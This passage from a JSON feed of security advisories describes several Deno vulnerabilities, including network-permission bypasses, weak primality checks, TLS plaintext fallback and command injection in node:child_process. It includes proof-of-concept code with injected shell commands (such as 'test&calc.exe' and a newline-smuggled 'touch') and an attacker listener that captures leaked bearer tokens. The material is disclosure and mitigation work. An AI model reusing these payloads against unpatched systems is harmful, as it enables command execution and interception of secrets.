aliases** reaching a denied resolved IP through the Node TCPWrap / options-host path. URL strings, `node:http2`, `undici`, and IPv6 numeric/mapped-address variants were not exhaustively tested by the reporter.\n\n## Not affected\n\n- Programs that do not use `--deny-net` at all (the bug is specifically about deny rules being bypassed; allow rules were always checked against the original string).\n- Native Deno networking APIs (`Deno.connect`, `Deno.connectTls`, `fetch`, ...), these already re-checked permissions after resolution as of PR #33203.\n- URL-string callers such as `fetch(\"http://2130706433/\")` or `node:http.request(\"http://2130706433/\")`, the URL parser normalized the hostname to its dotted-quad form before the   permission check ran.\n- Calls that do not provide `host`/`hostname` (e.g. connecting by IP literal or by a name that the deny rule already matches verbatim).\n\n## Workarounds\n\nIf you cannot upgrade immediately, reduce exposure by:\n\n- **Preferring an `--allow-net` allowlist over a `--deny-net` denylist.** An allowlist denies numeric aliases by default because they don't match the listed hostnames; only the destinations you've explicitly permitted can be reached.\n- **Validating untrusted host input** before passing it to `node:net.connect` / `node:http.request`. Reject hostnames that are purely decimal integers (`/^\\d+$/`) or begin with `0x`, as these are the alias forms exploited by the bypass.\n- **Avoiding the Node options-host path for sensitive calls** in favour of URL-string forms, which are normalized by the URL parser before the permission check.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-16T19:09:46.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-v8fw-85r8-5m23","https://nvd.nist.gov/vuln/detail/CVE-2026-49411","https://github.com/advisories/GHSA-v8fw-85r8-5m23"],"source_kind":"github","identifiers":["GHSA-v8fw-85r8-5m23","CVE-2026-49411"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.614Z","epss_percentage":0.00158,"epss_percentile":0.05117,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OGZ3LTg1cjgtNW0yM84ABY0n","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12OGZ3LTg1cjgtNW0yM84ABY0n","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.8.0","vulnerable_version_range":"\u003c= 2.7.14"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OGZ3LTg1cjgtNW0yM84ABY0n/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05eGc0LXFobTQtZzQzd84ABY0m","url":"https://github.com/advisories/GHSA-9xg4-qhm4-g43w","title":"Deno: Miller-Rabin Primality Test Allows Zero Rounds","description":"## Summary\n\n`node:crypto.checkPrime(candidate[, options][, callback])` and `crypto.checkPrimeSync(candidate[, options])` ran no Miller-Rabin rounds at all when the caller left `options.checks` at its default of `0`. In that mode, the only test applied to the candidate was trial division by the primes up to `17,863`. Any composite whose smallest prime factor exceeds that bound — for example the product of two primes just above it, such as `17,881 × 17,891` — was reported as `true` (\"probably prime\").\n\nThe same divergence affected the lower-level `op_node_check_prime` / `op_node_check_prime_bytes` paths that the polyfill calls into.\n\nNode.js itself does not have this problem: it forwards `checks = 0` to OpenSSL's `BN_check_prime`, which substitutes a sensible default number of rounds based on the candidate's bit length (per FIPS 186-4 Appendix C.3 Table C.1). Deno's Rust implementation had no equivalent fallback, so `count = 0` meant \"skip the loop entirely.\"\n\n## Affected APIs\n\n- `crypto.checkPrime(candidate)` (callback form, default options)\n- `crypto.checkPrime(candidate, { checks: 0 }, callback)`\n- `crypto.checkPrimeSync(candidate)` (default options)\n- `crypto.checkPrimeSync(candidate, { checks: 0 })`\n\nCallers who explicitly passed `checks \u003e= 1` were less affected, the loop ran the number of rounds they asked for, but were still receiving fewer rounds than Node would have applied for the same bit length. With the patched version they get at least the FIPS minimum.\n\n## Not affected\n\n- Deno's prime *generation* (`crypto.generatePrime`, `crypto.generatePrimeSync`, and the DH parameter generation path). Those routes go through `Prime::generate_with_options` in `ext/node_crypto/primes.rs`, which hardcodes `20` Miller-Rabin rounds and never reads a user-controlled `checks` value, so the bug never reached them.\n- Any other Deno-internal use of primality testing — `is_probably_prime` is not called from elsewhere in the runtime with `count = 0`. \n- Web Crypto (`crypto.subtle.*`), which uses entirely separate code paths and does not expose a primality test.\n\n## Impact\n\nThe realistic exposure is application-level: a Deno program that calls `crypto.checkPrime` (or its sync variant) with default options to validate an externally-supplied bignum, for example checking a peer-provided Diffie-Hellman prime, validating a prime read from configuration, or sanity-checking an RSA factor, will accept crafted composites as prime. The composite is trivial to construct: any product of two primes greater than `17,863` works.\n\nDownstream consequences depend on what the program does with the \"verified\" prime. If the prime is fed into a key exchange, signature verification, or factorization-style check, the security guarantees of that protocol collapse to whatever the attacker engineered into the composite.\n\nThe CVSS impact is bounded by the requirement that the victim application both (a) calls `checkPrime` with default options and (b) acts on the result for security-relevant input it does not control.\n\n## Reproduction\n\n```ts\nimport { checkPrimeSync } from \"node:crypto\";\n\n// 17881 and 17891 are both prime and both above the trial-division\n// ceiling used by Deno's implementation.\nconst composite = 17881n * 17891n;\n\n// Affected versions print `true`; the patched version prints `false`.\nconsole.log(checkPrimeSync(composite));\n```\n\nThe same result is reproducible from Rust against the internal helper:\n\n```rust\nuse num_bigint::BigInt;\nlet composite = BigInt::from(17881u32) * BigInt::from(17891u32);\nassert!(!is_probably_prime(\u0026composite, 0)); // fails on affected versions\n```\n\n## Fix\n\nPR [#34391](https://github.com/denoland/deno/pull/34391) introduces a\nhelper `min_miller_rabin_rounds_for_bits(bits)` that returns the FIPS\n186-4 Appendix C.3 round counts, matching the defaults OpenSSL uses\ninside `BN_check_prime`. `is_probably_prime` then clamps the loop bound\nto `count.max(min_miller_rabin_rounds_for_bits(n.bits()))`. The\nprobabilistic loop now always executes, regardless of what `checks`\nvalue the caller supplied, with a round count strong enough to keep the\nfalse-positive probability below 2^-80. Callers that pass a larger\nexplicit `checks` still get exactly that many rounds.\n\nUnit tests under `ext/node_crypto/primes.rs` cover the\n`17,881 × 17,891` case, a larger 64-bit composite, and the FIPS lookup\ntable itself.\n\n## Workarounds\n\nIf you cannot upgrade immediately:\n\n- **Pass an explicit `checks` value** when calling `crypto.checkPrime` or `crypto.checkPrimeSync`. A value of `64` is conservative for any reasonable bit length and keeps the loop running.\n- **Do not rely on `crypto.checkPrime` to validate attacker-influenced bignums** in security-critical paths until you are on the patched release.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-16T19:08:55.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.4,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-9xg4-qhm4-g43w","https://github.com/denoland/deno/pull/34391","https://github.com/advisories/GHSA-9xg4-qhm4-g43w"],"source_kind":"github","identifiers":["GHSA-9xg4-qhm4-g43w","CVE-2026-49440"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.614Z","epss_percentage":0.00237,"epss_percentile":0.14537,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05eGc0LXFobTQtZzQzd84ABY0m","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05eGc0LXFobTQtZzQzd84ABY0m","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.8.1","vulnerable_version_range":"\u003c= 2.8.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05eGc0LXFobTQtZzQzd84ABY0m/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03eGgzLW1oZzktamN3OM4ABY0l","url":"https://github.com/advisories/GHSA-7xh3-mhg9-jcw8","title":"Deno: Command Injection via spawnSync \u0026 spawn on Windows","description":"## Summary\n\nDeno's `node:child_process` implementation provided an `escapeShellArg()` helper used when callers passed `shell: true` to `spawn` / `spawnSync` / `exec` and friends. On Windows, the helper failed to quote arguments that contained `cmd.exe` metacharacters such as `\u0026`, `|`, `\u003c`, `\u003e`, `^`, `!`, `(`, `)`, and did not neutralize `%` (which `cmd.exe` expands even inside double-quoted strings). An attacker who controlled any portion of an argument passed to such a call could inject arbitrary additional commands into the spawned `cmd.exe` invocation.\n\nThis was the Windows counterpart to CVE-2026-27190, which fixed the same class of bug in the Unix branch of `escapeShellArg`.\n\n## Details\n\nOn Windows, `child_process` with `shell: true` ran the command via `cmd.exe /d /s /c \"\u003ccommand line\u003e\"`. Deno assembled that command line by joining the program name and each argument through `escapeShellArg()`.\n\nThe vulnerable check was:\n\n```ts\n// If no special characters, return as-is\nif (!/[\\s\"\\\\]/.test(arg)) {\n  return arg;\n}\n```\n\nThe regex covered only whitespace, double-quote, and backslash. Any argument containing `cmd.exe`-significant characters but none of those three was returned unquoted and therefore interpreted by the shell. The most straightforward exploit chained commands with `\u0026`:\n\n```js\nimport { spawnSync } from \"node:child_process\";\n\nspawnSync(\"echo\", [\"test\u0026calc.exe\"], { shell: true, encoding: \"utf-8\" });\n```\n\nThe reporter confirmed this launched `calc.exe` on Windows 11 with Deno 2.7.5. The same shape worked for `|`, `\u003c`, `\u003e`, `^`, `!`, `(`, and `)`.\n\nA secondary defect existed even when arguments were quoted: `cmd.exe` expands `%FOO%` environment-variable references inside double-quoted strings. Without either doubling `%` or rejecting it, an argument like `\"%USERPROFILE%\"` leaked environment data into the command line.\n\n## Proof of concept\n\nFrom the report, run on Windows with Deno `\u003c 2.7.10`:\n\n```js\nimport { spawnSync } from \"node:child_process\";\n\nconst maliciousInput = \"test\u0026calc.exe\";\nconst result = spawnSync(\"echo\", [maliciousInput], {\n  shell: true,\n  encoding: \"utf-8\",\n});\nconsole.log(result);\n```\n\nObserved: `calc.exe` launched as a side effect of the `echo` call.\n\n## Impact\n\nAny Deno program on Windows that called `child_process.spawn` / `spawnSync` / `exec` (or any shell helper that funneled through `escapeShellArg`) with `shell: true` and incorporated untrusted input into an argument was exposed to arbitrary command execution in the context of the Deno process. The CVSS vector treated this as network-reachable / high-complexity because the typical exposure path was a Deno service accepting external input and forwarding it to a shelled-out subprocess.\n\nNot affected:\n\n- Calls without `shell: true` (the default), which executed the program directly via `CreateProcess` without `cmd.exe` interpretation.\n- Unix platforms, which used the single-quote branch of `escapeShellArg` and were already fixed under CVE-2026-27190.\n- Callers that built command strings themselves and passed them as a single string with `shell: true` — those were the caller's responsibility and were never sanitized by Deno.\n\n## Workarounds\n\nUsers on unpatched versions could mitigate by:\n\n- Avoiding `shell: true` in `node:child_process` calls on Windows.\n- Building the argv directly and invoking the program without a shell.\n- Filtering or rejecting any externally-supplied argument values that contained `cmd.exe` metacharacters (`\u0026 | \u003c \u003e ^ ! ( ) %`) before passing them to `spawn` / `spawnSync` / `exec`.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-16T19:07:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-7xh3-mhg9-jcw8","https://nvd.nist.gov/vuln/detail/CVE-2026-49402","https://github.com/advisories/GHSA-7xh3-mhg9-jcw8"],"source_kind":"github","identifiers":["GHSA-7xh3-mhg9-jcw8","CVE-2026-49402"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.615Z","epss_percentage":0.00445,"epss_percentile":0.36817,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03eGgzLW1oZzktamN3OM4ABY0l","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03eGgzLW1oZzktamN3OM4ABY0l","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.10","vulnerable_version_range":"\u003c 2.7.10"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03eGgzLW1oZzktamN3OM4ABY0l/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00YzhnLWp2Y3gtdjRods4ABY0k","url":"https://github.com/advisories/GHSA-4c8g-jvcx-v4hv","title":"Deno: process.loadEnvFile() bypasses env permission checks and mutates process.env with only read access","description":"## Summary\n\nIn Deno, environment access is gated by the `env` permission. You can deny it\nwith `--deny-env`, or restrict it to a specific allowlist with\n`--allow-env=FOO,BAR`. The expectation is that a program running without `env`\npermission cannot change `process.env`.\n\n`process.loadEnvFile()` (the Node-compatible API for loading variables from a\n`.env` file) does **not** honor this. It only checks that the program has\n**read** permission for the dotenv file, then writes every key in that file\ninto the process environment — even when `env` access is denied.\n\nIn effect, **`--allow-read` plus a writable or attacker-controlled `.env` file\nis enough to defeat `--deny-env`.**\n\n## Am I affected?\n\nYou are potentially affected if **all** of the following are true:\n\n1. You run Deno **v2.3.0 or newer**.\n2. Your program (or any dependency it imports) calls `process.loadEnvFile()`\n   from `node:process`.\n3. You rely on Deno's permission model — specifically `--deny-env`, an\n   `--allow-env=…` allowlist, or running without granting `env` — as a\n   security boundary.\n4. The `.env` path passed to `loadEnvFile()` can be controlled or modified by\n   a less-trusted party (untrusted input, user-writable directory, third-party\n   dependency, etc.) and is covered by your `--allow-read` grant.\n\nIf your program does not use `process.loadEnvFile()` at all, or if it already\ngrants full `env` access, this advisory does not change your risk.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-16T19:04:57.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.2,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-4c8g-jvcx-v4hv","https://nvd.nist.gov/vuln/detail/CVE-2026-49983","https://github.com/advisories/GHSA-4c8g-jvcx-v4hv"],"source_kind":"github","identifiers":["GHSA-4c8g-jvcx-v4hv","CVE-2026-49983"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.615Z","epss_percentage":0.0014,"epss_percentile":0.03547,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00YzhnLWp2Y3gtdjRods4ABY0k","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00YzhnLWp2Y3gtdjRods4ABY0k","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.8.1","vulnerable_version_range":"\u003c= 2.8.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00YzhnLWp2Y3gtdjRods4ABY0k/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04M3BjLTNydzktcXB3as4ABY0j","url":"https://github.com/advisories/GHSA-83pc-3rw9-qpwj","title":"Deno: WebSocket API sandbox bypass via missing post-DNS check","description":"## Summary\n\nWhen a WebSocket connection was opened, Deno checked the destination hostname\nagainst `--deny-net` rules but did not re-check the IP addresses that hostname\nresolved to. An attacker-controlled script could use a specially crafted domain\nname that passes the hostname check yet resolves to a denied IP, bypassing the\nnetwork restriction entirely.\n\n## Impact\n\nCode running under `--deny-net` could connect to hosts that the user intended\nto block. In practice this means network isolation rules — for example,\nblocking access to `localhost` or internal services — could be silently\ncircumvented by a malicious or compromised dependency.\n\n`Deno.connect` and `fetch()` were not affected by this specific issue (a\ncompanion advisory covers `fetch()`).\n\n## Who is affected\n\nUsers who:\n\n- run untrusted or third-party code with `deno run`, and\n- rely on `--deny-net` to restrict which hosts that code can reach.\n\nIf you do not use `--deny-net`, or if you only run fully trusted code, you are\nnot affected.\n\n## Workaround\n\nNo workaround is available short of upgrading. If upgrading immediately is not\npossible, avoid granting `--allow-net` to untrusted code that also has\n`--deny-net` restrictions you depend on for security.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-16T19:04:07.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.2,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-83pc-3rw9-qpwj","https://nvd.nist.gov/vuln/detail/CVE-2026-49860","https://github.com/advisories/GHSA-83pc-3rw9-qpwj"],"source_kind":"github","identifiers":["GHSA-83pc-3rw9-qpwj","CVE-2026-49860"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.862Z","updated_at":"2026-08-29T17:01:28.616Z","epss_percentage":0.00141,"epss_percentile":0.03638,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04M3BjLTNydzktcXB3as4ABY0j","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04M3BjLTNydzktcXB3as4ABY0j","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.8.1","vulnerable_version_range":"\u003c= 2.8.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04M3BjLTNydzktcXB3as4ABY0j/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jcGdqLWY3ZzMtMnBwMs4ABY0i","url":"https://github.com/advisories/GHSA-cpgj-f7g3-2pp2","title":"Deno: `fetch()` API sandbox bypass via missing DNS resolution check","description":"## Summary\n\nWhen `fetch()` was called, Deno checked the destination hostname against\n`--deny-net` rules but did not re-check the IP addresses that hostname\nresolved to. An attacker-controlled script could use a specially crafted domain\nname that passes the hostname check yet resolves to a denied IP, bypassing the\nnetwork restriction entirely.\n\n## Impact\n\nCode running under `--deny-net` could reach hosts that the user intended to\nblock. In practice this means network isolation rules — for example, blocking\naccess to `localhost` or internal services — could be silently circumvented by\na malicious or compromised dependency.\n\nA companion advisory covers the same class of issue in the WebSocket API.\n\n## Who is affected\n\nUsers who:\n\n- run untrusted or third-party code with `deno run`, and\n- rely on `--deny-net` to restrict which hosts that code can reach.\n\nIf you do not use `--deny-net`, or if you only run fully trusted code, you are\nnot affected.\n\n## Workaround\n\nNo workaround is available short of upgrading. If upgrading immediately is not\npossible, avoid granting `--allow-net` to untrusted code that also has\n`--deny-net` restrictions you depend on for security.\n\n## Fix\n\nThe `fetch()` DNS resolver now performs a post-resolution check on every IP\naddress before passing it to the HTTP connector, consistent with how\n`Deno.connect` already behaved.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-16T19:02:55.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.2,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-cpgj-f7g3-2pp2","https://nvd.nist.gov/vuln/detail/CVE-2026-49859","https://github.com/advisories/GHSA-cpgj-f7g3-2pp2"],"source_kind":"github","identifiers":["GHSA-cpgj-f7g3-2pp2","CVE-2026-49859"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.862Z","updated_at":"2026-08-29T17:01:28.616Z","epss_percentage":0.00141,"epss_percentile":0.03638,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jcGdqLWY3ZzMtMnBwMs4ABY0i","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jcGdqLWY3ZzMtMnBwMs4ABY0i","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.8.1","vulnerable_version_range":"\u003c= 2.8.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jcGdqLWY3ZzMtMnBwMs4ABY0i/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jaHF2LTU2d3YtNzU2NM4ABXkw","url":"https://github.com/advisories/GHSA-chqv-56wv-7564","title":"Deno's TLS retry copies stale upgrade hook, risking plaintext traffic","description":"## Summary\n\nA flaw in Deno's Node.js tls compatibility layer could cause a TLS client to transmit application data in plaintext after a connection retry. When `autoSelectFamily was enabled and the first address-family attempt failed, the socket reinitialization path reused a stale TLS upgrade hook that was bound to the original, failed handle. \n\nAs a result, the replacement TCP connection was never upgraded to TLS, and any data the application wrote before the `secureConnect` event travelled over the network unencrypted.\n\nA network attacker positioned to cause the initial connection attempt to fail (for example, by dropping IPv6 traffic on a dual-stack host) could deterministically trigger the fallback path and observe or tamper with traffic that the application believed was TLS-protected.\n\n**Affected APIs**: Applications using Deno's `node:tls` or `node:https` surface with `autoSelectFamily` enabled (the default) that wrote to the socket before the `secureConnect` event.\n\n## Proof of concept\n\n`attacker.mjs` (captures whatever the client sends)\n\n```ts\nimport net from \"node:net\";\n\nconst server = net.createServer((socket) =\u003e {\n  console.log(\"[attacker] client connected from\", socket.remoteAddress);\n  socket.on(\"data\", (chunk) =\u003e {\n    // If TLS were working, this would be an opaque ClientHello.\n    // If the bug fires, we see the application payload in cleartext.\n    console.log(\"[attacker] received\", chunk.length, \"bytes:\");\n    console.log(chunk.toString(\"utf8\"));\n  });\n});\n\nserver.listen(4444, \"127.0.0.1\", () =\u003e {\n  console.log(\"[attacker] listening on 127.0.0.1:4444\");\n});\n```\n\n`victim.mjs` (a normal-looking TLS client)\n\n```ts\nimport tls from \"node:tls\";\n\nconst socket = tls.connect({\n  host: \"api.example.invalid\",\n  port: 4444,\n  autoSelectFamily: true, // Node-compat default\n\n  // First address is a black hole (nothing on [::1]:4444),\n  // so autoSelectFamily falls back to the second address.\n  // In a real attack, the on-path attacker arranges this via\n  // routing, DNS, or by dropping the first SYN.\n  lookup: (_host, _opts, cb) =\u003e {\n    cb(null, [\n      { address: \"::1\",       family: 6 }, // fails -\u003e retry\n      { address: \"127.0.0.1\", family: 4 }, // attacker\n    ]);\n  },\n\n  rejectUnauthorized: false,\n});\n\n// Application writes BEFORE secureConnect — common pattern in\n// Node clients that pipe a request body or send a greeting.\nsocket.write(\"POST /v1/charge HTTP/1.1\\r\\n\");\nsocket.write(\"Authorization: Bearer sk_live_SECRET_TOKEN\\r\\n\");\nsocket.write(\"Content-Type: application/json\\r\\n\\r\\n\");\nsocket.write(JSON.stringify({ amount: 100, card: \"4242424242424242\" }));\n\nsocket.on(\"secureConnect\", () =\u003e console.log(\"[victim] secureConnect\"));\nsocket.on(\"error\",         (e) =\u003e console.log(\"[victim] error:\", e.message));\n```\n\n\nIn terminal 1 `deno run --allow-net attacker.mjs`\nIn terminal 2 `deno run --allow-net victim.mjs`\n\n### Expected vs. observed\n\nOn a patched Deno (≥ 2.7.8), the attacker terminal sees an opaque TLS ClientHello (a binary blob starting with `0x16 0x03\n0x01 …`), and the victim eventually errors out because the attacker isn't speaking TLS.\n\nOn a vulnerable Deno (≥ 2.0.0, \u003c 2.7.8), the attacker terminal prints:\n\n```\n[attacker] received 41 bytes:\nPOST /v1/charge HTTP/1.1\nAuthorization: Bearer sk_live_SECRET_TOKEN\n...\n```\n\nThe bearer token, the request body, and the card number all appear in plaintext, even though the application used\n`tls.connect`.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-27T19:51:46.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.4,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-chqv-56wv-7564","https://nvd.nist.gov/vuln/detail/CVE-2026-44726","https://github.com/advisories/GHSA-chqv-56wv-7564"],"source_kind":"github","identifiers":["GHSA-chqv-56wv-7564","CVE-2026-44726"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-27T20:00:08.974Z","updated_at":"2026-08-29T17:01:46.173Z","epss_percentage":0.00234,"epss_percentile":0.14104,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jaHF2LTU2d3YtNzU2NM4ABXkw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jaHF2LTU2d3YtNzU2NM4ABXkw","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.8","vulnerable_version_range":"\u003e= 2.0.0, \u003c 2.7.8"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jaHF2LTU2d3YtNzU2NM4ABXkw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00Yzk2LXc4djItcDI4as4ABTlo","url":"https://github.com/advisories/GHSA-4c96-w8v2-p28j","title":"Deno vulnerable to command Injection via incomplete shell metacharacter blocklist in node:child_process","description":"## Summary\n\n  A command injection vulnerability exists in Deno's `node:child_process` polyfill (`shell: true` mode) that bypasses the fix\n  for CVE-2026-27190 (GHSA-hmh4-3xvx-q5hr). An attacker who controls arguments passed to `spawnSync` or `spawn` with `shell:\n  true` can execute arbitrary OS commands, bypassing Deno's permission system.\n\n  **Affected versions:** Deno v2.7.0, v2.7.1\n\n  ## Details\n\n  The two-stage argument sanitization in `transformDenoShellCommand` (`ext/node/polyfills/internal/child_process.ts`) has a\n  priority bug: when an argument contains a `$VAR` pattern, it is wrapped in double quotes (L1290) instead of single quotes\n  (L1293). Double quotes in POSIX sh do not suppress backtick command substitution, allowing injected commands to execute.\n\n  Attack chain:\n  1. `escapeShellArg` wraps the argument in single quotes (safe)\n  2. `op_node_parse_shell_args` strips the single-quote delimiters during tokenization (raw argument exposed)\n  3. Re-quoting detects `$VAR` pattern → applies double quotes\n  4. Backtick payload inside double quotes executes via `/bin/sh`\n\n  ## Impact\n\n  **OS Command Injection (CWE-78)**. Any application using `node:child_process` `spawn`/`spawnSync` with `shell: true` and\n  user-controlled arguments is vulnerable. Injected commands execute at the OS process level, outside Deno's permission\n  sandbox. Only `--allow-run` is required.\n\n  ## Mitigation\n\n  Avoid passing user-controlled input as arguments to `spawn`/`spawnSync` with `shell: true`. Use `shell: false` (the default)\n  instead, or validate/sanitize inputs before passing them.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-13T20:02:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-4c96-w8v2-p28j","https://nvd.nist.gov/vuln/detail/CVE-2026-32260","https://github.com/advisories/GHSA-4c96-w8v2-p28j"],"source_kind":"github","identifiers":["GHSA-4c96-w8v2-p28j","CVE-2026-32260"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-13T21:00:09.230Z","updated_at":"2026-08-29T17:03:11.195Z","epss_percentage":0.01483,"epss_percentile":0.71507,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Yzk2LXc4djItcDI4as4ABTlo","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00Yzk2LXc4djItcDI4as4ABTlo","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.2","vulnerable_version_range":"\u003e= 2.7.0, \u003c 2.7.2"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Yzk2LXc4djItcDI4as4ABTlo/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1obWg0LTN4dngtcTVocs4ABSmq","url":"https://github.com/advisories/GHSA-hmh4-3xvx-q5hr","title":"Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process","description":"## Summary\nA command injection vulnerability exists in Deno's `node:child_process` implementation. \n\n## Reproduction\n```javascript\nimport { spawnSync } from \"node:child_process\";\nimport * as fs from \"node:fs\";\n\n// Cleanup\ntry { fs.unlinkSync('/tmp/rce_proof'); } catch {}\n\n// Create legitimate script\nfs.writeFileSync('/tmp/legitimate.ts', 'console.log(\"normal\");');\n\n// Malicious input with newline injection\nconst maliciousInput = `/tmp/legitimate.ts\\ntouch /tmp/rce_proof`;\n\n// Vulnerable pattern\nspawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {\n  shell: true,\n  encoding: 'utf-8'\n});\n\n// Verify\nconsole.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));\n```\n\nRun: `deno run --allow-all poc.mjs`\n\nThe file `/tmp/rce_proof` is created, confirming arbitrary command execution.\n\n## Mitigation\n\nAll users need to update to the patched version (Deno 